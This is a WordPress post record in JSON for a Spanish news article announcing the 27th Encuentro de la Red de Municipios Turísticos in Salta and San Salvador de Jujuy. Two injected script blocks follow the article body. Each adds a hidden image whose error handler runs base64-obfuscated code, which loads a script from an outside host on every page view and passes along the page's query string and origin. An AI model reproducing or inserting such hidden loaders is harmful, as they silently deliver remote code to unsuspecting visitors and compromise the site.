{"id":4938,"date":"2025-03-12T10:16:54","date_gmt":"2025-03-12T13:16:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4938"},"modified":"2025-08-13T23:38:58","modified_gmt":"2025-08-14T02:38:58","slug":"llega-el-27-encuentro-de-la-red-de-municipios-turisticos-a-la-ciudad-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4938","title":{"rendered":"Llega el 27\u00b0 Encuentro de la Red de Municipios Tur\u00edsticos a la ciudad de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-dd2ef7e552dd92cd494d8ef078dcb844\" style=\"background-color:#055b8e\"><strong><em>Bajo el lema \u201cUn encuentro, dos destinos\u201d, el jueves 13 la ciudad ser\u00e1 sede de un nuevo evento. Contar\u00e1 con la participaci\u00f3n de m\u00e1s de 500 localidades del pa\u00eds y se centrar\u00e1 en el desarrollo sostenible y la colaboraci\u00f3n entre destinos tur\u00edsticos.<\/em><\/strong><\/h4>\n\n\n\n<p>La ciudad de Salta ser\u00e1 el punto de inicio del 27\u00b0 Encuentro de la Red de Municipios Tur\u00edsticos, que se llevar\u00e1 a cabo los d\u00edas 13, 14 y 15 de marzo, con actividades que se desarrollar\u00e1n en Salta y San Salvador de Jujuy. La apertura oficial se realizar\u00e1 el jueves 13 de marzo, a las 15 hs, en UTHGRA (Mitre 966).<\/p>\n\n\n\n<p>La inauguraci\u00f3n del encuentro contar\u00e1 con la presencia de autoridades locales, provinciales y nacionales, entre ellas el Intendente de la ciudad de Salta, Emiliano Durand, y la ministra de Turismo y Deportes de Salta, Manuela Arancibia, quienes estar\u00e1n acompa\u00f1ados por el presidente de la Red de Municipios Tur\u00edsticos, Pablo Sgubini, y autoridades de la regi\u00f3n.<\/p>\n\n\n\n<p>El evento, que se organiza con el apoyo de la Secretar\u00eda de Turismo, Ambiente y Deportes de la Naci\u00f3n y el Ministerio de Turismo y Deportes de Salta, re\u00fane a municipios tur\u00edsticos de todo el pa\u00eds para intercambiar experiencias y mejorar la gesti\u00f3n del turismo local. En este marco, se llevar\u00e1n a cabo diversas actividades, entre ellas mesas de trabajo sobre tendencias del sector, estrategias de promoci\u00f3n, marketing, legislaci\u00f3n, tecnolog\u00eda aplicada al turismo, sostenibilidad y desarrollo de microrregiones.<\/p>\n\n\n\n<p>El lema de este a\u00f1o, \u201cUn encuentro, dos destinos\u201d, resalta la importancia del asociativismo y la integraci\u00f3n regional, poniendo \u00e9nfasis en los beneficios de las alianzas entre ciudades, los corredores tur\u00edsticos y los convenios de reciprocidad. Adem\u00e1s, se destacar\u00e1 el impacto positivo que produce el intercambio de conocimientos en pro de un turismo sostenible.<\/p>\n\n\n\n<p>Un total de 26 municipios salte\u00f1os confirmaron su participaci\u00f3n, entre ellos Seclant\u00e1s, San Carlos, Cachi, Animan\u00e1, La Poma, Tolar Grande, San Antonio de los Cobres, San Lorenzo, Vaqueros y Met\u00e1n, que tendr\u00e1n la oportunidad de participar en una capacitaci\u00f3n pr\u00e1ctica y en la Mesa Federal, donde se debatir\u00e1n temas de la coyuntura actual y se planificar\u00e1n acciones conjuntas.<\/p>\n\n\n\n<p>El encuentro, que se lleva a cabo anualmente, es una plataforma fundamental para los municipios tur\u00edsticos de Argentina, promoviendo un trabajo conjunto en pos del desarrollo del turismo y el fortalecimiento de las pol\u00edticas p\u00fablicas a nivel local y regional.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/saltaciudad.travel\/wp-content\/uploads\/LOGO-SaltaMuni-350px-513.png\" alt=\"\" style=\"width:206px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Bajo el lema \u201cUn encuentro, dos destinos\u201d, el jueves 13 la ciudad ser\u00e1 sede de un nuevo evento. Contar\u00e1 con la participaci\u00f3n de m\u00e1s de 500 localidades del pa\u00eds y se centrar\u00e1 en el desarrollo sostenible y la colaboraci\u00f3n entre destinos tur\u00edsticos. La ciudad de Salta ser\u00e1 el punto de inicio del 27\u00b0 Encuentro de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4939,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-4938","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4938"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4938"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4938\/revisions"}],"predecessor-version":[{"id":6551,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4938\/revisions\/6551"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4939"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4938"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4938"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4938"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}